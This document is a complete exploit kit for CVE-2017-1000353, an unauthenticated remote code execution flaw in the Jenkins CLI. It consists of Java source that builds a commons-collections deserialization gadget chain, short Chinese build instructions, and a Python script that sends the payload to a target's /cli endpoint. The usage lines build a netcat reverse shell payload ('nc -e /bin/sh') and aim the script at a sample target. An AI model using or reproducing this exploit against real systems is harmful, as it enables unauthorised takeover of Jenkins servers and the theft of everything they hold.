Jenkins Unauthenticated Code Execution -- CVE-2017-1000353
将该 Payload.java 源代码编译为 Payload.jar。编译时需把 commons-collections 3.x 和 json-lib（提供 net.sf.json.JSONArray）放入 classpath——这两个依赖对应源码顶部的 import，生成的 Payload.ser 只有在目标 Jenkins 的 classpath 上也存在这些类时才会被反序列化成功。
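import java.io.FileOutputStream;
import java.io.ObjectOutputStream;
import java.io.ObjectStreamException;
import java.io.Serializable;
import java.lang.reflect.Field;
import java.security.KeyPair;
import java.security.KeyPairGenerator;
import java.security.PrivateKey;
import java.security.PublicKey;
import java.security.Signature;
import java.security.SignedObject;
import java.util.Comparator;
import java.util.HashMap;
import java.util.HashSet;
import java.util.Map;
import java.util.concurrent.ConcurrentSkipListSet;
import java.util.concurrent.CopyOnWriteArraySet;
import net.sf.json.JSONArray;
import org.apache.commons.collections.Transformer;
import org.apache.commons.collections.collection.AbstractCollectionDecorator;
import org.apache.commons.collections.functors.ChainedTransformer;
import org.apache.commons.collections.functors.ConstantTransformer;
import org.apache.commons.collections.functors.InvokerTransformer;
import org.apache.commons.collections.keyvalue.TiedMapEntry;
import org.apache.commons.collections.map.LazyMap;
import org.apache.commons.collections.map.ReferenceMap;
import org.apache.commons.collections.set.ListOrderedSet;

/**
 * Writer side of the CVE-2017-1000353 Jenkins CLI proof of concept: produces the
 * serialized object graph that the accompanying Python script prefixes with the
 * remoting preamble and posts to {@code /cli}.
 *
 * <p>The inner gadget is the classic commons-collections chain: a {@link TiedMapEntry}
 * over a {@link LazyMap} whose {@link ChainedTransformer} resolves
 * {@code Runtime.getRuntime().exec(cmd)}. {@code TiedMapEntry.hashCode()} calls
 * {@code getValue()}, i.e. {@code LazyMap.get("foo")}, and a missing key makes LazyMap
 * run the transformer chain. The entry is planted (via reflection) as the sole element
 * of a {@link HashSet}, whose {@code readObject} re-inserts its elements and therefore
 * calls {@code hashCode()} on the target. That set is then sealed inside a
 * {@link SignedObject}, which stores it as a nested serialized byte[] that only
 * {@code SignedObject.getObject()} unpacks.
 *
 * <p>The outer json-lib / JDK collection wrapping ({@link ListOrderedSet} over a
 * {@link JSONArray}, {@link ConcurrentSkipListSet}, two {@link CopyOnWriteArraySet}s,
 * a {@link ReferenceMap}) is presumably what routes the target's
 * {@code ReferenceMap.readObject -> put -> hashCode()/equals()} to
 * {@code JSONArray.equals -> fromObject} bean introspection and from there to
 * {@code SignedObject.getObject()}, so the blacklisted inner classes are never named
 * in the outer stream. NOTE(review): that routing is inferred from the shape of the
 * graph, not from anything in this file -- confirm against the advisory before
 * relying on it.
 *
 * <p>{@link #writeReplace()} substitutes the inner graph for the {@code Payload}
 * instance, so neither this class nor {@link Container} appears in the output;
 * {@code DummyComperator.writeReplace()} returns {@code null}, so the skip-list set is
 * serialized without any comparator.
 */
public class Payload implements Serializable {

    /** The object actually written to the stream (see {@link #writeReplace()}). */
    private Serializable payload;

    /**
     * Builds the graph for {@code cmd}.
     *
     * @param cmd command string handed to {@code Runtime.exec(String)} on the target;
     *            that overload tokenizes on whitespace, so no shell quoting applies
     * @throws Exception on reflection or key-generation failure
     */
    public Payload(String cmd) throws Exception {
        this.payload = this.setup(cmd);
    }

    /**
     * Assembles the full serializable gadget graph.
     *
     * @param cmd command for the target's {@code Runtime.exec(String)}
     * @return the outer {@link ReferenceMap} that is written to the stream
     * @throws Exception on reflection or key-generation failure
     */
    @SuppressWarnings({"rawtypes", "unchecked"})
    public Serializable setup(String cmd) throws Exception {
        // Runtime.class -> getMethod("getRuntime") -> invoke(null) -> exec(cmd) -> 1.
        // Each transformer's output is the next one's input; the trailing
        // ConstantTransformer(1) just gives LazyMap a harmless value to store.
        final String[] execArgs = new String[] { cmd };
        final Transformer[] transformers = new Transformer[] {
            new ConstantTransformer(Runtime.class),
            new InvokerTransformer("getMethod",
                    new Class[] { String.class, Class[].class },
                    new Object[] { "getRuntime", new Class[0] }),
            new InvokerTransformer("invoke",
                    new Class[] { Object.class, Object[].class },
                    new Object[] { null, new Object[0] }),
            new InvokerTransformer("exec",
                    new Class[] { String.class },
                    execArgs),
            new ConstantTransformer(1)
        };
        final Transformer chain = new ChainedTransformer(transformers);

        // LazyMap runs the chain for any key it does not contain; "foo" is never put,
        // so TiedMapEntry.hashCode() -> getValue() -> LazyMap.get("foo") fires it.
        final Map lazyMap = LazyMap.decorate(new HashMap(), chain);
        final TiedMapEntry trigger = new TiedMapEntry(lazyMap, "foo");

        // Build a one-element HashSet with a plain key, then swap the stored key for the
        // trigger via reflection: adding the trigger directly would call its hashCode()
        // here, on the generating machine.
        final HashSet set = new HashSet(1);
        set.add("foo");
        final HashMap backing = (HashMap) readField(set, HashSet.class, "map", "backingMap");
        final Object[] table = (Object[]) readField(backing, HashMap.class, "table", "elementData");
        final Object node = firstNonNull(table);
        Field keyField;
        try {
            keyField = node.getClass().getDeclaredField("key");
        } catch (NoSuchFieldException e) {
            // The alternate names used above and here ("backingMap", "elementData",
            // java.util.MapEntry) are presumably for a non-HotSpot collections
            // implementation (Android?) -- not exercised on an OpenJDK/Oracle JVM.
            keyField = Class.forName("java.util.MapEntry").getDeclaredField("key");
        }
        keyField.setAccessible(true);
        keyField.set(node, trigger);

        // Seal the set in a SignedObject. SignedObject.getObject() deserializes the
        // embedded bytes without verifying, so the key pair is throwaway.
        final KeyPairGenerator keyGen = KeyPairGenerator.getInstance("DSA");
        keyGen.initialize(1024);
        final KeyPair keyPair = keyGen.genKeyPair();
        final PrivateKey privateKey = keyPair.getPrivate();
        final Signature signature = Signature.getInstance(privateKey.getAlgorithm());
        final SignedObject signed = new SignedObject(set, privateKey, signature);

        // ListOrderedSet only decorates a Set, and JSONArray is a List, so the
        // decorated collection is forced in through the private field.
        final JSONArray jsonArray = new JSONArray();
        jsonArray.add("asdf");
        final ListOrderedSet orderedSet = new ListOrderedSet();
        final Field collectionField =
                AbstractCollectionDecorator.class.getDeclaredField("collection");
        collectionField.setAccessible(true);
        collectionField.set(orderedSet, jsonArray);

        final ConcurrentSkipListSet skipList = new ConcurrentSkipListSet(new DummyComperator());
        skipList.add(signed);

        // Two CopyOnWriteArraySets holding the same pair of elements in opposite order.
        // Order matters: CopyOnWriteArraySet.add() calls equals() against existing
        // elements, and Container keeps those build-time comparisons away from the
        // wrapped object (Container.writeReplace() unwraps it for the stream).
        final CopyOnWriteArraySet first = new CopyOnWriteArraySet();
        first.add(orderedSet);
        first.add(new Container(skipList));
        final CopyOnWriteArraySet second = new CopyOnWriteArraySet();
        second.add(skipList);
        second.add(orderedSet);

        // ReferenceMap.readObject re-puts every entry (per commons-collections), so both
        // keys get hashCode()/equals() on the target -- the entry point into the graph.
        final ReferenceMap outer = new ReferenceMap();
        outer.put(new Container(first), "asdf");
        outer.put(new Container(second), "asdf");
        return outer;
    }

    /**
     * Reads a declared field of {@code type} from {@code target}, trying each candidate
     * name in turn (to cope with differing collection field layouts).
     *
     * @throws NoSuchFieldException if none of the names exists on {@code type}
     */
    private static Object readField(Object target, Class<?> type, String... names)
            throws Exception {
        NoSuchFieldException last = new NoSuchFieldException(type.getName());
        for (String name : names) {
            try {
                Field f = type.getDeclaredField(name);
                f.setAccessible(true);
                return f.get(target);
            } catch (NoSuchFieldException e) {
                last = e;
            }
        }
        throw last;
    }

    /**
     * Returns the first occupied bucket of a hash table (the set holds exactly one
     * element, so there is exactly one), rather than assuming it landed in slot 0 or 1.
     *
     * @throws IllegalStateException if every bucket is null
     */
    private static Object firstNonNull(Object[] table) {
        for (Object bucket : table) {
            if (bucket != null) {
                return bucket;
            }
        }
        throw new IllegalStateException("HashMap table has no occupied bucket");
    }

    /** Serialization hook: the stream receives the inner graph, never this instance. */
    private Object writeReplace() throws ObjectStreamException {
        return this.payload;
    }

    /**
     * Serialization shim: {@link #writeReplace()} emits the wrapped object, so the
     * stream is identical to adding {@code o} directly, but no equals()/hashCode() is
     * invoked on {@code o} while the graph is built. For the JSONArray path that
     * build-time call could otherwise reach the payload on the generating machine.
     */
    static class Container implements Serializable {
        private final Object o;

        public Container(Object o) {
            this.o = o;
        }

        private Object writeReplace() throws ObjectStreamException {
            return o;
        }
    }

    /**
     * Comparator that reports every pair as equal; used only while building the
     * skip-list set. {@link #writeReplace()} returns {@code null}, so the serialized
     * {@link ConcurrentSkipListSet} carries no comparator at all.
     */
    @SuppressWarnings("rawtypes")
    static class DummyComperator implements Comparator, Serializable {
        @Override
        public int compare(Object left, Object right) {
            return 0;
        }

        private Object writeReplace() throws ObjectStreamException {
            return null;
        }
    }

    /**
     * Entry point: {@code java -jar payload.jar <outfile> <cmd>} writes the serialized
     * graph for {@code cmd} to {@code outfile}. Bad usage exits with status 1; the output
     * stream is closed in a {@code finally} block instead of being left to the GC.
     */
    public static void main(String[] args) throws Exception {
        if (args.length != 2) {
            System.err.println("java -jar payload.jar outfile cmd");
            System.exit(1);
        }
        final Payload pwn = new Payload(args[1]);
        final FileOutputStream out = new FileOutputStream(args[0]);
        try {
            final ObjectOutputStream oos = new ObjectOutputStream(out);
            oos.writeObject(pwn);
            oos.flush();
        } finally {
            out.close();
        }
    }
}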
# usage: java -jar Payload.jar <outfile> <cmd>   (see Payload.main)
# NOTE(review): <cmd> is run on the Jenkins host through Runtime.exec(String), which
# splits it on whitespace -- no shell is involved. 127.0.0.1:8888 here is therefore the
# *target's* loopback; replace it with a listener address reachable from the Jenkins
# server. "nc -e" also needs a netcat build that supports -e (many distros ship one that
# does not).
java -jar Payload.jar Payload.ser "nc -e /bin/sh 127.0.0.1 8888"
将以下源代码保存为 jenkins_unauthenticated_code_execution.py。脚本依赖 requests 库，并会从当前目录读取上一步生成的 Payload.ser，因此请在同一目录下运行。
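#!/usr/bin/env python
# -*- coding: utf-8 -*-
# Author: f0rsaken
# CVE-2017-1000353
"""Sender for the Jenkins CLI unauthenticated deserialization PoC (CVE-2017-1000353).

Opens the two halves of a Jenkins CLI full-duplex HTTP session against
``http://<target>/cli``: a ``Side: download`` POST held open in a background
thread and, 1.2 s later, a ``Side: upload`` POST whose body is the remoting
preamble followed by the serialized gadget graph read from ``Payload.ser``
(generated by ``Payload.jar``). Per the advisory, the server deserializes that
upload body, which is what runs the command baked into the payload.

Runs under Python 2 and 3: ``PREAMBLE`` is a bytes literal so it concatenates
with the file contents on both. Requires the third-party ``requests`` package.
"""
import requests
import sys
import threading
import time
import uuid

# Fresh session id shared by the download and upload sides.
SESSION = str(uuid.uuid4())

# Remoting channel preamble: the capability marker, a base64-encoded serialized
# hudson.remoting.Capability, then four NUL bytes. Must be reproduced verbatim.
PREAMBLE = b"<===[JENKINS REMOTING CAPACITY]===>rO0ABXNyABpodWRzb24ucmVtb3RpbmcuQ2FwYWJpbGl0eQAAAAAAAAABAgABSgAEbWFza3hwAAAAAAAAAH4=\x00\x00\x00\x00"

# Serialized gadget graph produced by Payload.jar, expected in the working directory.
with open("Payload.ser", "rb") as _payload_file:
    SER = _payload_file.read()


def download(url, session):
    """Open the download half of the duplex session.

    Blocks until the server closes the connection. Meant to run in a background
    thread; a requests error here surfaces in that thread, not in ``exploit``.
    """
    headers = {"Side": "download", "Session": session}
    requests.post(url, headers=headers)


def upload(url, session, data):
    """Send ``data`` (preamble + serialized payload) as the upload half."""
    headers = {"Side": "upload", "Session": session}
    requests.post(url, headers=headers, data=data)


def exploit(target):
    """Fire the payload at ``target`` (``host:port``, no scheme).

    Returns ``target`` when the upload POST completed without a requests
    error, ``False`` otherwise. The response is not inspected, so a truthy
    return is not proof the command ran -- check the listener instead.
    """
    url = "http://" + target + "/cli"
    # Daemon thread: the download request is held open by the server, and a
    # non-daemon thread would keep the process alive after the upload finished.
    t = threading.Thread(target=download, args=(url, SESSION))
    t.daemon = True
    try:
        t.start()
        # Give the download side time to register the session before uploading.
        time.sleep(1.2)
        upload(url, SESSION, PREAMBLE + SER)
    except requests.RequestException:
        return False
    return target


def main():
    """CLI entry point: ``python jenkins_unauthenticated_code_execution.py host:port``."""
    try:
        target = sys.argv[1]
    except IndexError:
        print("Jenkins Unauthenticated Code Execution")
        print("usage: %s host:port" % sys.argv[0])
        return
    print(exploit(target))


if __name__ == "__main__":
    main()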
# usage: python jenkins_unauthenticated_code_execution.py <host:port>
# Pass only host:port -- the script prepends "http://" and appends "/cli" itself.
# Payload.ser must be in the current directory; the printed result only reports
# that the upload POST completed, not that the command executed.
python jenkins_unauthenticated_code_execution.py 192.168.56.101:8080